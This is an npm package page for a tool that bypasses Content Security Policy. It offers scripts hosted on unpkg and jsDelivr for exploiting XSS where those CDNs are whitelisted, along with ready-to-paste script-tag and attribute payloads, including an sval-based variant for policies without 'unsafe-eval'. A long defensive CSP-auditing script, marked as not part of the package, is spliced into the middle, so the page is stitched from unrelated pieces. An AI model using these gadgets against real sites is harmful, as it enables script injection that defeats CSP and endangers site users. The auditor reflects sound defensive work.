an1msh-csp-bypass

1.0.2 • Public • Published

easy-csp-bypass

Just a fun project to see if this code can end up in some CDN, so it would be easier to exploit XSS with CSP.

How to use?

Well, it depends. If you are lucky enough to find unsafe-eval in the CSP configuration, you can use one of these scenarios:

  • Classic => /dist/classic.js
  • Classic-infinite => /dist/classic-infinite.js
  • Url => /dist/url.js

If you can't use eval() because unsafe-eval is not in the configuration, well, it's not over!! I found a JavaScript interpreter called sval. It can easily bypass the unsafe-eval restriction :)!

  • Classic => /dist/sval-classic.js
  • Classic-infinite => /dist/sval-infinite.js
  • Url => /dist/sval-url.js

Example

If you have an XSS on a website with CSP, search in the directive 'script-src' for unpkg.com or jsDelivr. If these domains are whitelisted, you win!

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
  <br csp="alert(1)">

If 'unsafe-eval' is missing, use the sval one:

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/sval-classic.js"></script>
  <br csp="alert(1)">
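From the defending side, the precondition described above (a script-src that trusts a CDN serving arbitrary published packages) can be checked in a policy before it ships. The following auditor is an added example, not part of this package; the CDN host list, the function names and the sample policy are assumptions constructed for illustration.

```javascript
// Added example (not from the package). Assumed list of CDNs that serve any
// user-published npm package; extend it for your environment.
const OPEN_PACKAGE_CDNS = ["unpkg.com", "cdn.jsdelivr.net"];

// Parse a CSP header value into Map(directive -> source expressions).
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    // The first occurrence of a directive wins; duplicates are ignored.
    if (name && !policy.has(name)) policy.set(name, sources);
  }
  return policy;
}

// True when a source expression permits loading scripts from `host`.
// Path restrictions are ignored, so the result is conservative.
function sourceCoversHost(source, host) {
  if (source.startsWith("'")) return false;        // keyword, nonce or hash
  if (/^(\*|https?:)$/.test(source)) return true;  // any host
  const m = /^(?:[a-z][a-z0-9+.-]*:\/\/)?([^\/:]+)/.exec(source);
  if (!m) return false;
  const pattern = m[1];
  // "*.example.com" matches subdomains only, never the bare domain.
  return pattern.startsWith("*.") ? host.endsWith(pattern.slice(1)) : pattern === host;
}

// Return human-readable findings for the directive that governs scripts.
function auditScriptSrc(header) {
  const policy = parseCsp(header);
  const sources = policy.get("script-src") ?? policy.get("default-src");
  if (!sources) return ["no script-src or default-src: any script origin is allowed"];
  const findings = [];
  if (sources.includes("'unsafe-eval'")) findings.push("'unsafe-eval' permits eval()");
  // With 'strict-dynamic', CSP3 browsers ignore host and scheme sources.
  if (sources.includes("'strict-dynamic'")) return findings;
  for (const host of OPEN_PACKAGE_CDNS) {
    const hit = sources.find((s) => sourceCoversHost(s, host));
    if (hit) findings.push(`${hit} permits any package hosted on ${host}`);
  }
  return findings;
}

// Constructed sample policy.
const SAMPLE = "default-src 'self'; script-src 'self' https://unpkg.com *.jsdelivr.net";
console.log(auditScriptSrc(SAMPLE));
```

A policy without 'unsafe-eval' is still flagged when one of these hosts is allowed, since the sval builds described above do not rely on eval().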

Install

  npm i an1msh-csp-bypass

  • Weekly downloads: 1
  • Version: 1.0.2
  • License: SEE LICENSE IN LICENSE
  • Unpacked size: 491 kB
  • Total files: 24
  • Collaborators: an1msh